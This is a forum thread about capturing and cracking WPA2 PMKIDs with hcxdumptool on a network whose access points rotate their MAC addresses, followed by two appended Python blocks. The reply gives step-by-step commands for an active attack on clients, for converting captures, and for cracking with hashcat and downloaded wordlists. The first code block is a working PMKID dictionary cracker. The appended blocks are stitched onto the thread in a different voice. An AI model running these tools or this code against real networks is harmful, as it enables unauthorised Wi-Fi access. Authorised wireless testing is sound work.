Q related to hcxtools
#1
Hi all,

I am testing hcxdumptool in an environment where there are no autonomous wireless access points, but instead lightweight access points which get their config via a wireless controller. It does not seem to work, because the MAC address of the wireless access point changes all the time. As a result I cannot use a filter to attack a specific wireless access point.

Any advice on how to try to get the PMKID in this situation?

regards
Damien
#2
I don't think that this kind of AP is using PMKID caching, because that doesn't make sense if the MAC changes often.
Please notice that the PMKID depends on the MAC:
Code:
PMKID = HMAC-SHA1-128(PMK, "PMK Name" | MAC_AP | MAC_STA)

Maybe one of the CLIENTs of this NETWORK is weak (M1M2ROGUE). Try to attack them instead of the hardened AP:
Code:
$ hcxdumptool -i INTERFACE -o dumpfile.pcapng --enable_status=23 --active_beacon --stop_client_m2_attacks=100
Run the attack for some hours to make sure you get as much information as possible from the CLIENTs.

If there are other APs or CLIENTs in range that you are not targeting, I recommend protecting them with BPFC.
from --help:
create BPF to protect a MAC
Code:
$ tcpdump -i <interface> not wlan addr1 11:22:33:44:55:66 and not wlan addr2 11:22:33:44:55:66 -ddd > protect.bpf
add all MACs to protect (each MAC as addr1 and addr2) separated by "and not wlan"
and run hcxdumptool with activated BPF:
Code:
$ hcxdumptool -i INTERFACE -o dumpfile.pcapng --enable_status=23 --active_beacon --stop_client_m2_attacks=100 --bpfc=protect.bpf

Then convert to hc22000:
Code:
$ hcxpcapngtool -E wl -I wl -U wl --all -o test.hc22000 dumpfile.pcapng
Please notice:
We have to use --all, because NC is currently broken in hashcat.
https://hashcat.net/forum/thread-10253-p...#pid53602l

Now use hashcat on the recorded traffic as a first attempt:
Code:
$ hashcat -m 22000 test.hc22000 wl

proceed with hcxpsktool:
Code:
$ hcxpsktool -c test.hc22000 --weakpass --eudate --usdate --wpskeys | hashcat -m 22000 test.hc22000

proceed with wpa-sec confirmed lists:
Code:
$ wget https://wpa-sec.stanev.org/dict/rkg.txt.gz
$ hashcat -m 22000 test.hc22000 rkg.txt.gz
$ wget https://wpa-sec.stanev.org/dict/cracked.txt.gz
$ hashcat -m 22000 test.hc22000 cracked.txt.gz

If that doesn't work, do some open source intelligence (OSINT) via DuckDuckGo picture search and try some masks and rules.
These wordlists may be useful, too:
https://3wifi.stascorp.com/3wifi-dic-2021-09-03.7z
https://hashmob.net/downloads
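The formula quoted in post #2 is the whole reason a changing AP MAC hurts: the same PMK yields a different PMKID for every MAC_AP. The block below, an added example that is not part of the thread and not code from hcxtools or hashcat, derives the PMK from a passphrase with PBKDF2-HMAC-SHA1, computes the PMKID, writes it out in the 22000 line layout hashcat documents for the PMKID case (WPA*01*PMKID*MAC_AP*MAC_STA*ESSID_HEX***), and then performs the same per-candidate check hashcat -m 22000 does. All ESSID, MAC and passphrase values are constructed for the demonstration; the function names are this example's own.

```python
"""PMKID derivation and candidate check for WPA2-PSK (added example, not hcxtools/hashcat code)."""
import hashlib
import hmac


def mac_bytes(mac: str) -> bytes:
    """Parse 'aa:bb:cc:dd:ee:ff', 'aa-bb-...' or 'aabbccddeeff' into 6 raw bytes."""
    clean = mac.replace(":", "").replace("-", "").lower()
    if len(clean) != 12:
        raise ValueError(f"bad MAC address: {mac!r}")
    return bytes.fromhex(clean)


def derive_pmk(passphrase: str, essid: str) -> bytes:
    """WPA2-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, ESSID, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), essid.encode(), 4096, 32)


def pmkid(pmk: bytes, mac_ap: str, mac_sta: str) -> bytes:
    """PMKID = HMAC-SHA1-128(PMK, "PMK Name" | MAC_AP | MAC_STA): first 16 bytes of HMAC-SHA1."""
    data = b"PMK Name" + mac_bytes(mac_ap) + mac_bytes(mac_sta)
    return hmac.new(pmk, data, hashlib.sha1).digest()[:16]


def to_hc22000(pmkid_value: bytes, mac_ap: str, mac_sta: str, essid: str) -> str:
    """Serialise a PMKID as a hashcat 22000 line (type 01): WPA*01*PMKID*MAC_AP*MAC_STA*ESSID_HEX***."""
    return "WPA*01*{}*{}*{}*{}***".format(
        pmkid_value.hex(), mac_bytes(mac_ap).hex(), mac_bytes(mac_sta).hex(), essid.encode().hex()
    )


def parse_hc22000(line: str) -> dict:
    """Split a 22000 line into its fields; only the PMKID form (type 01) is handled here."""
    fields = line.strip().split("*")
    if len(fields) != 9 or fields[0] != "WPA" or fields[1] != "01":
        raise ValueError("not a WPA*01 (PMKID) hash line")
    return {
        "pmkid": bytes.fromhex(fields[2]),
        "mac_ap": fields[3],
        "mac_sta": fields[4],
        "essid": bytes.fromhex(fields[5]).decode(errors="replace"),
    }


def candidate_matches(line: str, passphrase: str) -> bool:
    """Per-candidate check as hashcat -m 22000 does it: PBKDF2 -> PMK, recompute PMKID, compare."""
    h = parse_hc22000(line)
    pmk = derive_pmk(passphrase, h["essid"])
    return hmac.compare_digest(pmkid(pmk, h["mac_ap"], h["mac_sta"]), h["pmkid"])


def crack(line: str, wordlist):
    """Return the first wordlist entry that reproduces the captured PMKID, or None."""
    for word in wordlist:
        if candidate_matches(line, word):
            return word
    return None


if __name__ == "__main__":
    # Constructed sample values; they do not come from any real capture.
    ESSID, PSK = "TestNet", "correct horse"
    AP1, AP2, STA = "00:11:22:33:44:55", "00:11:22:33:44:66", "aa:bb:cc:dd:ee:ff"
    pmk = derive_pmk(PSK, ESSID)
    line = to_hc22000(pmkid(pmk, AP1, STA), AP1, STA, ESSID)
    print(line)
    # Same PMK and station, different AP MAC: the PMKID no longer matches.
    print(pmkid(pmk, AP1, STA).hex(), pmkid(pmk, AP2, STA).hex())
    print(crack(line, ["password", "12345678", PSK]))
```

Running it prints one hash line, two different PMKIDs for the two AP MACs, and the recovered passphrase. The point for the thread: a PMKID captured from one BSSID only ever verifies against that BSSID, so a controller that rotates the AP MAC does not invalidate an already captured PMKID, but every new BSSID the client sees is a separate hash that has to be captured and cracked on its own.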
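The --help text quoted in post #2 shows the protection filter for a single MAC and says to chain further MACs with "and not wlan". The block below, an added example that is not from the thread or from hcxtools, builds that expression for any number of MACs (normalising the notation and dropping duplicates) and compiles it with tcpdump -ddd into the decimal BPF program that --bpfc loads. It assumes tcpdump is installed, that the interface given is the monitor-mode wlan interface hcxdumptool will run on (so the wlan primitives compile against the right link type), and that it is run with the same privileges as hcxdumptool. The MAC values and function names are this example's own.

```python
"""Build and compile a hcxdumptool --bpfc protection filter for several MACs (added example)."""
import subprocess


def normalize_mac(mac: str) -> str:
    """Accept aa:bb:..., aa-bb-... or aabbccddeeff and return the lowercase colon form."""
    clean = mac.replace(":", "").replace("-", "").lower()
    if len(clean) != 12 or any(c not in "0123456789abcdef" for c in clean):
        raise ValueError(f"bad MAC address: {mac!r}")
    return ":".join(clean[i:i + 2] for i in range(0, 12, 2))


def protect_filter(macs) -> str:
    """tcpdump expression that rejects any frame carrying a protected MAC as addr1 or addr2.

    For one MAC this is exactly the --help example,
    'not wlan addr1 <mac> and not wlan addr2 <mac>'; further MACs are joined with 'and'.
    Duplicates are dropped so the compiled program stays short.
    """
    terms = []
    seen = set()
    for mac in macs:
        m = normalize_mac(mac)
        if m in seen:
            continue
        seen.add(m)
        terms.append(f"not wlan addr1 {m}")
        terms.append(f"not wlan addr2 {m}")
    if not terms:
        raise ValueError("no MACs to protect")
    return " and ".join(terms)


def compile_protect_bpf(macs, interface: str, out_path: str) -> str:
    """Run tcpdump -ddd on the interface and write the decimal BPF program for --bpfc.

    Returns the expression that was compiled. tcpdump must be installed and the
    interface must be the monitor-mode wlan interface hcxdumptool will use (assumption).
    """
    expr = protect_filter(macs)
    result = subprocess.run(
        ["tcpdump", "-i", interface, "-ddd", expr],
        capture_output=True, text=True, check=True,
    )
    with open(out_path, "w") as f:
        f.write(result.stdout)
    return expr


if __name__ == "__main__":
    import sys
    # Constructed example: two neighbouring devices that must not be touched.
    protected = ["11:22:33:44:55:66", "aa-bb-cc-dd-ee-ff"]
    print(protect_filter(protected))
    if len(sys.argv) == 3:  # usage: python protect_bpf.py wlan0mon protect.bpf
        compile_protect_bpf(protected, sys.argv[1], sys.argv[2])
```

After compiling, pass the file with --bpfc=protect.bpf exactly as in post #2. Keep in mind the filter only protects frames where the MAC appears as addr1 or addr2; every other AP and client in range is still fair game, so list every MAC you are not authorised to touch.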